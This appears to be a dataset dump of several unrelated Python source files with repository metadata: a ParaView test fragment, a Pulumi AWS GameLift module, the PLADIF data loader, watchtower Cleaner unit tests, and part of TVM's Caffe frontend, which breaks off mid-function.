objectSaveAnimationDialog = 'FileSaveAnimationDialog'
QtTesting.playCommand(objectSaveAnimationDialog, 'filesSelected', '$PARAVIEW_TEST_ROOT/movie_test.png')
time.sleep(3);
objectPlayButton = 'pqClientMainWindow/VCRToolbar/1QToolButton2'
while QtTesting.getProperty(objectPlayButton, "text") != 'Play' :
time.sleep(1);
QtTestingImage.compareImage('$PARAVIEW_TEST_ROOT/movie_test.0005.png', 'SaveAnimationMultiView.png');
| 55.576087
| 191
| 0.825543
|
aa6072a558dffdce13798f2b6efb65f1d2f32089
| 6,696
|
py
|
Python
|
sdk/python/pulumi_aws_native/gamelift/get_game_session_queue.py
|
pulumi/pulumi-aws-native
|
1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3
|
[
"Apache-2.0"
] | 29
|
2021-09-30T19:32:07.000Z
|
2022-03-22T21:06:08.000Z
|
sdk/python/pulumi_aws_native/gamelift/get_game_session_queue.py
|
pulumi/pulumi-aws-native
|
1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3
|
[
"Apache-2.0"
] | 232
|
2021-09-30T19:26:26.000Z
|
2022-03-31T23:22:06.000Z
|
sdk/python/pulumi_aws_native/gamelift/get_game_session_queue.py
|
pulumi/pulumi-aws-native
|
1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3
|
[
"Apache-2.0"
] | 4
|
2021-11-10T19:42:01.000Z
|
2022-02-05T10:15:49.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetGameSessionQueueResult',
'AwaitableGetGameSessionQueueResult',
'get_game_session_queue',
'get_game_session_queue_output',
]
@pulumi.output_type
class GetGameSessionQueueResult:
def __init__(__self__, arn=None, custom_event_data=None, destinations=None, filter_configuration=None, id=None, notification_target=None, player_latency_policies=None, priority_configuration=None, tags=None, timeout_in_seconds=None):
if arn and not isinstance(arn, str):
raise TypeError("Expected argument 'arn' to be a str")
pulumi.set(__self__, "arn", arn)
if custom_event_data and not isinstance(custom_event_data, str):
raise TypeError("Expected argument 'custom_event_data' to be a str")
pulumi.set(__self__, "custom_event_data", custom_event_data)
if destinations and not isinstance(destinations, list):
raise TypeError("Expected argument 'destinations' to be a list")
pulumi.set(__self__, "destinations", destinations)
if filter_configuration and not isinstance(filter_configuration, dict):
raise TypeError("Expected argument 'filter_configuration' to be a dict")
pulumi.set(__self__, "filter_configuration", filter_configuration)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if notification_target and not isinstance(notification_target, str):
raise TypeError("Expected argument 'notification_target' to be a str")
pulumi.set(__self__, "notification_target", notification_target)
if player_latency_policies and not isinstance(player_latency_policies, list):
raise TypeError("Expected argument 'player_latency_policies' to be a list")
pulumi.set(__self__, "player_latency_policies", player_latency_policies)
if priority_configuration and not isinstance(priority_configuration, dict):
raise TypeError("Expected argument 'priority_configuration' to be a dict")
pulumi.set(__self__, "priority_configuration", priority_configuration)
if tags and not isinstance(tags, list):
raise TypeError("Expected argument 'tags' to be a list")
pulumi.set(__self__, "tags", tags)
if timeout_in_seconds and not isinstance(timeout_in_seconds, int):
raise TypeError("Expected argument 'timeout_in_seconds' to be a int")
pulumi.set(__self__, "timeout_in_seconds", timeout_in_seconds)
@property
@pulumi.getter
def arn(self) -> Optional[str]:
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="customEventData")
def custom_event_data(self) -> Optional[str]:
return pulumi.get(self, "custom_event_data")
@property
@pulumi.getter
def destinations(self) -> Optional[Sequence['outputs.GameSessionQueueDestination']]:
return pulumi.get(self, "destinations")
@property
@pulumi.getter(name="filterConfiguration")
def filter_configuration(self) -> Optional['outputs.GameSessionQueueFilterConfiguration']:
return pulumi.get(self, "filter_configuration")
@property
@pulumi.getter
def id(self) -> Optional[str]:
return pulumi.get(self, "id")
@property
@pulumi.getter(name="notificationTarget")
def notification_target(self) -> Optional[str]:
return pulumi.get(self, "notification_target")
@property
@pulumi.getter(name="playerLatencyPolicies")
def player_latency_policies(self) -> Optional[Sequence['outputs.GameSessionQueuePlayerLatencyPolicy']]:
return pulumi.get(self, "player_latency_policies")
@property
@pulumi.getter(name="priorityConfiguration")
def priority_configuration(self) -> Optional['outputs.GameSessionQueuePriorityConfiguration']:
return pulumi.get(self, "priority_configuration")
@property
@pulumi.getter
def tags(self) -> Optional[Sequence['outputs.GameSessionQueueTag']]:
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="timeoutInSeconds")
def timeout_in_seconds(self) -> Optional[int]:
return pulumi.get(self, "timeout_in_seconds")
class AwaitableGetGameSessionQueueResult(GetGameSessionQueueResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetGameSessionQueueResult(
arn=self.arn,
custom_event_data=self.custom_event_data,
destinations=self.destinations,
filter_configuration=self.filter_configuration,
id=self.id,
notification_target=self.notification_target,
player_latency_policies=self.player_latency_policies,
priority_configuration=self.priority_configuration,
tags=self.tags,
timeout_in_seconds=self.timeout_in_seconds)
def get_game_session_queue(id: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetGameSessionQueueResult:
"""
Resource Type definition for AWS::GameLift::GameSessionQueue
"""
__args__ = dict()
__args__['id'] = id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws-native:gamelift:getGameSessionQueue', __args__, opts=opts, typ=GetGameSessionQueueResult).value
return AwaitableGetGameSessionQueueResult(
arn=__ret__.arn,
custom_event_data=__ret__.custom_event_data,
destinations=__ret__.destinations,
filter_configuration=__ret__.filter_configuration,
id=__ret__.id,
notification_target=__ret__.notification_target,
player_latency_policies=__ret__.player_latency_policies,
priority_configuration=__ret__.priority_configuration,
tags=__ret__.tags,
timeout_in_seconds=__ret__.timeout_in_seconds)
@_utilities.lift_output_func(get_game_session_queue)
def get_game_session_queue_output(id: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetGameSessionQueueResult]:
"""
Resource Type definition for AWS::GameLift::GameSessionQueue
"""
...
| 43.2
| 237
| 0.709229
|
36ea5a21bfb971f781171b1784bf435d8009291d
| 5,147
|
py
|
Python
|
pladif/data.py
|
thilaire/PLADIF
|
2eab080e60505f6efe8050b7144498a504d441a4
|
[
"MIT"
] | null | null | null |
pladif/data.py
|
thilaire/PLADIF
|
2eab080e60505f6efe8050b7144498a504d441a4
|
[
"MIT"
] | null | null | null |
pladif/data.py
|
thilaire/PLADIF
|
2eab080e60505f6efe8050b7144498a504d441a4
|
[
"MIT"
] | null | null | null |
""""This file is part of PLADIF.
MIT License
Copyright (c) 2022 - Thibault Hilaire
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
PLADIF is a simple tool that plots attrakdiff graphs from CSV files (like those from Usabilla).
It is written by Thibault Hilaire
File: data.py
Date: March 2022
class for the data
"""
from __future__ import annotations
from io import BytesIO
from os.path import splitext
from pandas import read_csv, read_excel
from math import log10
from pladif.naming import order_long, order_short, pairs
def datasize(size, lang):
"""
Calculate the size of a code in B/KB/MB.../
Return a tuple of (value, unit)
"""
# see https://stackoverflow.com/questions/12523586/python-format-size-application-converting-b-to-kb-mb-gb-tb
units = {'en': ["B", "kB", "MB", "GB", "TB"], 'fr': ["o", "ko", "Mo", "Go", "To"], 'de': ["B", "kB", "MB", "GB", "TB"]}
if size:
scaling = round(log10(size))//3
scaling = min(len(units)-1, scaling)
return "%.3f %s" % (size/(10**(3*scaling)), units[lang][scaling])
else:
return "unknown"
def removeStar(st: str) -> str:
"""remove the '*' character in the end of the categories"""
return st[:-1] if '*' in st else st
class DataAttrakdiff:
"""encapsulates the data
- _filename: (str) file name
- _CSVcolumns: list of initial column names (in the CSV file)
- _df: (DataFrame) data
"""
def __init__(self, file: BytesIO | str):
"""Load the data from an (already open) csv file
The data is normalize in [-3,3]
"""
# open the file if its just a filename
if isinstance(file, str):
file = open(file, "rb")
self._filename = file.name
_, ext = splitext(self._filename)
# read the excel file into a dataframe
if ext[1:] == 'csv':
self._df = read_csv(file, index_col=0, encoding="UTF-16", delimiter='\t') # encoding=None, encoding_errors="replace"
# drop all the columns after the URL column
try:
url_index = self._df.columns.get_loc("URL")
except KeyError:
raise ValueError("The csv file is not a valid Usabilla one (does not contain a 'URL' column) !")
self._CSVcolumns = self._df.columns[:url_index]
self._df.drop(columns=self._df.columns[url_index:], inplace=True)
# check the size and rename the columns
if len(self._df.columns) not in [len(order_short), len(order_long)]:
raise ValueError("The csv file is not a valid Usabilla one (doesn not have %d or %d useful columns)" % (
len(order_short), len(order_long)))
self._df.columns = order_short if len(self._df.columns) == len(order_short) else order_long
elif ext[1:] in ['xls', 'xlsx', 'xlsm', 'xlsb', 'odf', 'ods', 'odt']:
self._df = read_excel(file, sheet_name=0, index_col=0) # encoding=None, encoding_errors="replace"
self._CSVcolumns = self._df.columns
# check if the columns are valid
if set(self._df.columns) != set(order_short) and set(self._df.columns) != set(order_long):
raise ValueError("The excel file doesn't have proper columns (not in %s)" % str(order_long))
# normalize data in [-3,3]
for col, serie in self._df.items():
if '*' in col:
self._df[col] = 4 - self._df[col] # reverse from 3 to -3
else:
self._df[col] = self._df[col] - 4 # from -3 to 3
# remove the '*' and sort the columns (same order as the ordered dictionary `pairs`
self._df.columns = map(removeStar, self._df.columns)
d = {k: v for v, k in enumerate(pairs)}
col, self._CSVcolumns = zip(*sorted(zip(self._df.columns, self._CSVcolumns), key=lambda x: d.get(x[0])))
self._df = self._df.reindex(columns=col)
# get filesize
try:
self._size = file.getbuffer().nbytes
except AttributeError:
self._size = 0
def summary(self, col, lang):
"""return a summary of the data
containing the filename, the number of users and """
col = list(c if '*' not in c else c[:-1] for c in col)
d = {col: csv for col, csv in zip(self._df.columns, self._CSVcolumns)}
return [self._filename, str(self._df.shape[0]), datasize(self._size, lang)] + [d.get(c, '') for c in col]
@property
def columns(self):
"""returns the columns"""
return self._df.columns
@property
def df(self):
"""return the dataframe"""
return self._df
| 38.125926
| 120
| 0.700019
|
216c9b924bda70647af17c7ce898507268ebff83
| 205
|
py
|
Python
|
blog/users/views.py
|
zn79213/blog
|
b396b4319afc066da1eb5eca40179a9b0ca9fa74
|
[
"MIT"
] | null | null | null |
blog/users/views.py
|
zn79213/blog
|
b396b4319afc066da1eb5eca40179a9b0ca9fa74
|
[
"MIT"
] | null | null | null |
blog/users/views.py
|
zn79213/blog
|
b396b4319afc066da1eb5eca40179a9b0ca9fa74
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
# 注册试图
from django.views import View
class RegisterView(View):
def get(self, request):
return render(request, "register.html")
| 17.083333
| 47
| 0.721951
|
e956440c7eea33a98f0dbbd7ea5381779ffef44f
| 11,420
|
py
|
Python
|
test/teos/unit/test_cleaner.py
|
orbitalturtle/python-teos
|
bcdde7675ebdaa4e63482b0c6ea3c80a89e8e67e
|
[
"MIT"
] | null | null | null |
test/teos/unit/test_cleaner.py
|
orbitalturtle/python-teos
|
bcdde7675ebdaa4e63482b0c6ea3c80a89e8e67e
|
[
"MIT"
] | null | null | null |
test/teos/unit/test_cleaner.py
|
orbitalturtle/python-teos
|
bcdde7675ebdaa4e63482b0c6ea3c80a89e8e67e
|
[
"MIT"
] | null | null | null |
import random
from uuid import uuid4
from teos.cleaner import Cleaner
from teos.gatekeeper import UserInfo
from teos.responder import TransactionTracker
from common.appointment import Appointment
from test.teos.unit.conftest import get_random_value_hex
from common.constants import LOCATOR_LEN_BYTES, LOCATOR_LEN_HEX
CONFIRMATIONS = 6
ITEMS = 10
MAX_ITEMS = 100
ITERATIONS = 10
# FIXME: 194 this is using the dummiest appointment, can be updated with the fixture once it's implemented
def set_up_appointments(db_manager, total_appointments):
appointments = dict()
locator_uuid_map = dict()
for i in range(total_appointments):
uuid = uuid4().hex
locator = get_random_value_hex(LOCATOR_LEN_BYTES)
appointment = Appointment(locator, None, None)
appointments[uuid] = {"locator": appointment.locator}
locator_uuid_map[locator] = [uuid]
db_manager.store_watcher_appointment(uuid, appointment.to_dict())
db_manager.create_append_locator_map(locator, uuid)
# Each locator can have more than one uuid assigned to it.
if i % 2:
uuid = uuid4().hex
appointments[uuid] = {"locator": appointment.locator}
locator_uuid_map[locator].append(uuid)
db_manager.store_watcher_appointment(uuid, appointment.to_dict())
db_manager.create_append_locator_map(locator, uuid)
return appointments, locator_uuid_map
# FIXME: 194 this is using the dummiest tracker, can be updated with the fixture once it's implemented
def set_up_trackers(db_manager, total_trackers):
trackers = dict()
tx_tracker_map = dict()
for i in range(total_trackers):
uuid = uuid4().hex
# We use the same txid for penalty and dispute here, it shouldn't matter
penalty_txid = get_random_value_hex(32)
dispute_txid = get_random_value_hex(32)
locator = dispute_txid[:LOCATOR_LEN_HEX]
# Assign both penalty_txid and dispute_txid the same id (it shouldn't matter)
tracker = TransactionTracker(locator, dispute_txid, penalty_txid, None, None)
trackers[uuid] = {"locator": tracker.locator, "penalty_txid": tracker.penalty_txid}
tx_tracker_map[penalty_txid] = [uuid]
db_manager.store_responder_tracker(uuid, tracker.to_dict())
db_manager.create_append_locator_map(tracker.locator, uuid)
# Each penalty_txid can have more than one uuid assigned to it.
if i % 2:
uuid = uuid4().hex
trackers[uuid] = {"locator": tracker.locator, "penalty_txid": tracker.penalty_txid}
tx_tracker_map[penalty_txid].append(uuid)
db_manager.store_responder_tracker(uuid, tracker.to_dict())
db_manager.create_append_locator_map(tracker.locator, uuid)
return trackers, tx_tracker_map
def test_delete_appointment_from_memory(db_manager):
appointments, locator_uuid_map = set_up_appointments(db_manager, MAX_ITEMS)
for uuid in list(appointments.keys()):
Cleaner.delete_appointment_from_memory(uuid, appointments, locator_uuid_map)
# The appointment should have been deleted from memory, but not from the db
assert uuid not in appointments
assert db_manager.load_watcher_appointment(uuid) is not None
def test_delete_appointment_from_db(db_manager):
appointments, locator_uuid_map = set_up_appointments(db_manager, MAX_ITEMS)
for uuid in list(appointments.keys()):
Cleaner.delete_appointment_from_db(uuid, db_manager)
# The appointment should have been deleted from memory, but not from the db
assert uuid in appointments
assert db_manager.load_watcher_appointment(uuid) is None
def test_update_delete_db_locator_map(db_manager):
appointments, locator_uuid_map = set_up_appointments(db_manager, MAX_ITEMS)
for uuid, appointment in appointments.items():
locator = appointment.get("locator")
locator_map_before = db_manager.load_locator_map(locator)
Cleaner.update_delete_db_locator_map([uuid], locator, db_manager)
locator_map_after = db_manager.load_locator_map(locator)
if locator_map_after is None:
assert locator_map_before is not None
else:
assert uuid in locator_map_before and uuid not in locator_map_after
def test_delete_outdated_appointments(db_manager):
for _ in range(ITERATIONS):
appointments, locator_uuid_map = set_up_appointments(db_manager, MAX_ITEMS)
outdated_appointments = random.sample(list(appointments.keys()), k=ITEMS)
Cleaner.delete_outdated_appointments(outdated_appointments, appointments, locator_uuid_map, db_manager)
assert not set(outdated_appointments).issubset(appointments.keys())
def test_delete_completed_appointments(db_manager):
for _ in range(ITERATIONS):
appointments, locator_uuid_map = set_up_appointments(db_manager, MAX_ITEMS)
completed_appointments = random.sample(list(appointments.keys()), k=ITEMS)
len_before_clean = len(appointments)
Cleaner.delete_completed_appointments(completed_appointments, appointments, locator_uuid_map, db_manager)
# ITEMS appointments should have been deleted from memory
assert len(appointments) == len_before_clean - ITEMS
# Make sure they are not in the db either
db_appointments = db_manager.load_watcher_appointments(include_triggered=True)
assert not set(completed_appointments).issubset(db_appointments)
def test_flag_triggered_appointments(db_manager):
for _ in range(ITERATIONS):
appointments, locator_uuid_map = set_up_appointments(db_manager, MAX_ITEMS)
triggered_appointments = random.sample(list(appointments.keys()), k=ITEMS)
len_before_clean = len(appointments)
Cleaner.flag_triggered_appointments(triggered_appointments, appointments, locator_uuid_map, db_manager)
# ITEMS appointments should have been deleted from memory
assert len(appointments) == len_before_clean - ITEMS
# Make sure that all appointments are flagged as triggered in the db
db_appointments = db_manager.load_all_triggered_flags()
assert set(triggered_appointments).issubset(db_appointments)
def test_delete_trackers_db_match(db_manager):
# Completed and outdated trackers are deleted using the same method. The only difference is the logging message
height = 0
for _ in range(ITERATIONS):
trackers, tx_tracker_map = set_up_trackers(db_manager, MAX_ITEMS)
selected_trackers = random.sample(list(trackers.keys()), k=ITEMS)
completed_trackers = {tracker: 6 for tracker in selected_trackers}
Cleaner.delete_trackers(completed_trackers, height, trackers, tx_tracker_map, db_manager)
assert not set(completed_trackers).issubset(trackers.keys())
def test_delete_trackers_no_db_match(db_manager):
height = 0
for _ in range(ITERATIONS):
trackers, tx_tracker_map = set_up_trackers(db_manager, MAX_ITEMS)
selected_trackers = random.sample(list(trackers.keys()), k=ITEMS)
# Let's change some uuid's by creating new trackers that are not included in the db and share a penalty_txid
# with another tracker that is stored in the db.
for uuid in selected_trackers[: ITEMS // 2]:
penalty_txid = trackers[uuid].get("penalty_txid")
dispute_txid = get_random_value_hex(32)
locator = dispute_txid[:LOCATOR_LEN_HEX]
new_uuid = uuid4().hex
trackers[new_uuid] = {"locator": locator, "penalty_txid": penalty_txid}
tx_tracker_map[penalty_txid].append(new_uuid)
selected_trackers.append(new_uuid)
# Let's add some random data
for i in range(ITEMS // 2):
uuid = uuid4().hex
penalty_txid = get_random_value_hex(32)
dispute_txid = get_random_value_hex(32)
locator = dispute_txid[:LOCATOR_LEN_HEX]
trackers[uuid] = {"locator": locator, "penalty_txid": penalty_txid}
tx_tracker_map[penalty_txid] = [uuid]
selected_trackers.append(uuid)
completed_trackers = {tracker: 6 for tracker in selected_trackers}
# We should be able to delete the correct ones and not fail in the others
Cleaner.delete_trackers(completed_trackers, height, trackers, tx_tracker_map, db_manager)
assert not set(completed_trackers).issubset(trackers.keys())
# FIXME: 194 will do with dummy gatekeeper since this is only deleting data from the structures
def test_delete_gatekeeper_appointments(gatekeeper):
# delete_gatekeeper_appointments should delete the appointments from user as long as both exist
appointments_not_to_delete = {}
appointments_to_delete = {}
# Let's add some users and appointments to the Gatekeeper
for _ in range(10):
user_id = get_random_value_hex(16)
# The UserInfo params do not matter much here
gatekeeper.registered_users[user_id] = UserInfo(available_slots=100, subscription_expiry=0)
for _ in range(random.randint(0, 10)):
# Add some appointments
uuid = get_random_value_hex(16)
gatekeeper.registered_users[user_id].appointments[uuid] = 1
if random.randint(0, 1) % 2:
appointments_to_delete[uuid] = user_id
else:
appointments_not_to_delete[uuid] = user_id
# Now let's delete half of them
Cleaner.delete_gatekeeper_appointments(appointments_to_delete, gatekeeper.registered_users, gatekeeper.user_db)
all_appointments_gatekeeper = []
# Let's get all the appointments in the Gatekeeper
for user_id, user in gatekeeper.registered_users.items():
all_appointments_gatekeeper.extend(user.appointments)
# Check that the first half of the appointments are not in the Gatekeeper, but the second half is
assert not set(appointments_to_delete).issubset(all_appointments_gatekeeper)
assert set(appointments_not_to_delete).issubset(all_appointments_gatekeeper)
def test_delete_outdated_users(gatekeeper):
# This tests the deletion of users whose subscription has outdated (subscription expires now)
# Create some users with associated data and add them to the gatekeeper
users = {}
current_height = gatekeeper.block_processor.get_block_count()
for _ in range(10):
appointments = {get_random_value_hex(32): Appointment(get_random_value_hex(32), None, None)}
user_id = get_random_value_hex(16)
user_info = UserInfo(available_slots=100, subscription_expiry=current_height, appointments=appointments)
users[user_id] = user_info
gatekeeper.registered_users[user_id] = user_info
# Get a list of the users that should be deleted at this block height (must match the newly generated ones)
users_to_be_deleted = gatekeeper.get_outdated_user_ids(current_height + gatekeeper.expiry_delta)
assert users_to_be_deleted == list(users.keys())
# Delete the users
Cleaner.delete_outdated_users(users_to_be_deleted, gatekeeper.registered_users, gatekeeper.user_db)
# Check that the users are not in the gatekeeper anymore
for user_id in users_to_be_deleted:
assert user_id not in gatekeeper.registered_users
assert not gatekeeper.user_db.load_user(user_id)
| 41.831502
| 116
| 0.728722
|
dd3abcf3cfa28a96b4d47c65a629eee7383c96af
| 115
|
py
|
Python
|
kaishisong-20210605/test_case/dev_case/quotation/__init__.py
|
ti132520/kaishisong-python-test
|
22eccd989ebb9e7401838d2b3cb82cd211d7660e
|
[
"Apache-2.0"
] | null | null | null |
kaishisong-20210605/test_case/dev_case/quotation/__init__.py
|
ti132520/kaishisong-python-test
|
22eccd989ebb9e7401838d2b3cb82cd211d7660e
|
[
"Apache-2.0"
] | null | null | null |
kaishisong-20210605/test_case/dev_case/quotation/__init__.py
|
ti132520/kaishisong-python-test
|
22eccd989ebb9e7401838d2b3cb82cd211d7660e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Author : 怕你呀
# Time : 2021/6/5
# File : __init__.py
# IDE : PyCharm
| 19.166667
| 25
| 0.46087
|
2d9f44e284f49a162defe5e604e36e89d7c0080f
| 38,008
|
py
|
Python
|
python/tvm/relay/frontend/caffe.py
|
shengxinhu/tvm
|
06c443e9959452c6da3a911fe0c11e08c5554477
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 4,640
|
2017-08-17T19:22:15.000Z
|
2019-11-04T15:29:46.000Z
|
python/tvm/relay/frontend/caffe.py
|
shengxinhu/tvm
|
06c443e9959452c6da3a911fe0c11e08c5554477
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 2,863
|
2017-08-17T19:55:50.000Z
|
2019-11-04T17:18:41.000Z
|
python/tvm/relay/frontend/caffe.py
|
shengxinhu/tvm
|
06c443e9959452c6da3a911fe0c11e08c5554477
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1,352
|
2017-08-17T19:30:38.000Z
|
2019-11-04T16:09:29.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument, too-many-lines, import-outside-toplevel
# pylint: disable=no-else-return, no-else-continue
"""Caffe frontend."""
import numpy as np
import tvm
from tvm.ir import IRModule
from ... import nd as _nd
from .. import analysis
from .. import expr as _expr
from .. import function as _function
from .. import op as _op
from .common import ExprTable
from .common import infer_shape as _infer_shape
__all__ = ["from_caffe"]
class OperatorConverter(object):
"""Operator Converted for converting Caffe ops to Relay ops"""
def __init__(self, init_layer_dict, predict_layer, exp_tab):
self.init_layer_dict = init_layer_dict
self.predict_layer = predict_layer
self.exp_tab = exp_tab
self.new_bn = {}
self.changed_layers = None
self.convert_map = {
"BatchNorm": self.convert_batch_norm,
"Concat": self.convert_concat,
"Convolution": self.convert_conv,
"Crop": self.convert_crop,
"Deconvolution": self.convert_deconv,
"Dropout": self.convert_dropout,
"Eltwise": self.convert_eltwise,
"Embed": self.convert_embed,
"Flatten": self.convert_flatten,
"InnerProduct": self.convert_innerproduct,
"Input": None,
"LRN": self.convert_lrn,
"Permute": self.convert_permute,
"Pooling": self.convert_pooling,
"Power": self.convert_power,
"PReLU": self.convert_prelu,
"ReLU": self.convert_relu,
"Reshape": self.convert_reshape,
"Scale": self.convert_scale,
"Sigmoid": self.convert_sigmoid,
"Slice": self.convert_slice,
"Softmax": self.convert_softmax,
"TanH": self.convert_tanh,
"Reduction": self.convert_reduction,
}
def convert_flatten(self, op):
"""Convert Flatten layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
flatten_params = op.flatten_param.axis
assert flatten_params == 1, "flatten axis should be 1"
out = _op.nn.batch_flatten(in_expr)
return out
def convert_eltwise(self, op):
"""Convert Eltwise layer"""
inputs = op.bottom
assert len(inputs) >= 2, "input tensors length should be larger than 2"
# gethering initial 2 input expressions
lhs_expr = self.exp_tab.get_expr(inputs[0])
rhs_expr = self.exp_tab.get_expr(inputs[1])
lhs_shape = _infer_shape(lhs_expr)
rhs_shape = _infer_shape(rhs_expr)
assert lhs_shape == rhs_shape, "input tensors shape should be equal"
eltwise_params = op.eltwise_param
eltwise_type_dict = ["PROD", "SUM", "MAX"]
eltwise_type = eltwise_params.operation
coeff = list(eltwise_params.coeff)
if eltwise_type_dict[eltwise_type] == "PROD":
out = _op.multiply(lhs_expr, rhs_expr)
# for rest inputs
for i in range(len(inputs) - 2):
extra_expr = self.exp_tab.get_expr(inputs[i + 2])
assert _infer_shape(out) == _infer_shape(extra_expr)
out = _op.multiply(out, extra_expr)
elif eltwise_type_dict[eltwise_type] == "SUM":
if coeff:
left_coeff_expr = self.exp_tab.new_const(np.asarray(coeff[0], np.float32))
right_coeff_expr = self.exp_tab.new_const(np.asarray(coeff[1], np.float32))
lhs_expr_scale = _op.multiply(lhs_expr, left_coeff_expr)
rhs_expr_scale = _op.multiply(rhs_expr, right_coeff_expr)
out = _op.add(lhs_expr_scale, rhs_expr_scale)
else:
out = _op.add(lhs_expr, rhs_expr)
# for rest inputs
for i in range(len(inputs) - 2):
extra_expr = self.exp_tab.get_expr(inputs[i + 2])
assert _infer_shape(out) == _infer_shape(extra_expr)
if coeff:
coeff_expr = self.exp_tab.new_const(np.asarray(coeff[i + 2], np.float32))
extra_expr_scale = _op.multiply(extra_expr, coeff_expr)
out = _op.add(out, extra_expr_scale)
else:
out = _op.add(out, extra_expr)
elif eltwise_type_dict[eltwise_type] == "MAX":
out = _op.maximum(lhs_expr, rhs_expr)
# for rest inputs
for i in range(len(inputs) - 2):
extra_expr = self.exp_tab.get_expr(inputs[i + 2])
assert _infer_shape(out) == _infer_shape(extra_expr)
out = _op.maximum(out, extra_expr)
else:
raise tvm.error.OpNotImplemented(
"eltwise_type {} is not supported for frontend Caffe.".format(eltwise_type)
)
return out
def _parse_conv_params(self, op):
"""Parse the parameters of Convolution and Deconvolution layer"""
nonzone = lambda val, pos, dflt: val[pos] if pos < len(val) else dflt
conv_params = op.convolution_param
params = dict()
# parse kernel size
if conv_params.kernel_h > 0 or conv_params.kernel_w > 0:
params["kernel_size"] = (conv_params.kernel_h, conv_params.kernel_w)
else:
ksize_h = nonzone(conv_params.kernel_size, 0, 1)
ksize_w = nonzone(conv_params.kernel_size, 1, ksize_h)
params["kernel_size"] = (ksize_h, ksize_w)
# parse padding size
if conv_params.pad_h > 0 or conv_params.pad_w > 0:
params["padding"] = (conv_params.pad_h, conv_params.pad_w)
else:
pad_h = nonzone(conv_params.pad, 0, 0)
pad_w = nonzone(conv_params.pad, 1, pad_h)
params["padding"] = (pad_h, pad_w)
# parse stride size
if conv_params.stride_h > 0 or conv_params.stride_w > 0:
params["strides"] = (conv_params.stride_h, conv_params.stride_w)
else:
stride_h = nonzone(conv_params.stride, 0, 1)
stride_w = nonzone(conv_params.stride, 1, stride_h)
params["strides"] = (stride_h, stride_w)
# parse dilation size
if hasattr(conv_params, "dilation") and len(conv_params.dilation) > 0:
dilation = " ".join(str(d) for d in conv_params.dilation)
dilation = tuple(map(int, dilation.split(" ")))
params["dilation"] = dilation
if len(dilation) == 1:
params["dilation"] = (dilation[0], dilation[0])
params["kernel_layout"] = "OIHW"
params["data_layout"] = "NCHW"
params["groups"] = conv_params.group
params["channels"] = conv_params.num_output
return params
def convert_batch_norm(self, op):
"""Convert BatchNorm layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
n, c, h, w = _infer_shape(in_expr)
if op.name in self.new_bn:
mean, var, eps, gamma, beta = self.new_bn[op.name]
mean_expr = self.exp_tab.new_const(mean, dtype="float32")
var_expr = self.exp_tab.new_const(var, dtype="float32")
gamma_expr = self.exp_tab.new_const(gamma, dtype="float32")
beta_expr = self.exp_tab.new_const(beta, dtype="float32")
out = _op.nn.batch_norm(
in_expr, gamma_expr, beta_expr, mean_expr, var_expr, epsilon=eps, scale=True
)
else:
weight_bias_blobs = self.init_layer_dict[op.name].blobs
mean = np.asarray(weight_bias_blobs[0].data, np.float32)
var = np.asarray(weight_bias_blobs[1].data, np.float32)
if len(weight_bias_blobs) == 2:
mean = np.repeat(mean, h * w).reshape((c, h, w))
mean = np.expand_dims(mean, 0).repeat(n, axis=0)
mean_expr = self.exp_tab.new_const(mean, dtype="float32")
var = np.repeat(var, h * w).reshape((c, h, w))
var = np.expand_dims(var, 0).repeat(n, axis=0)
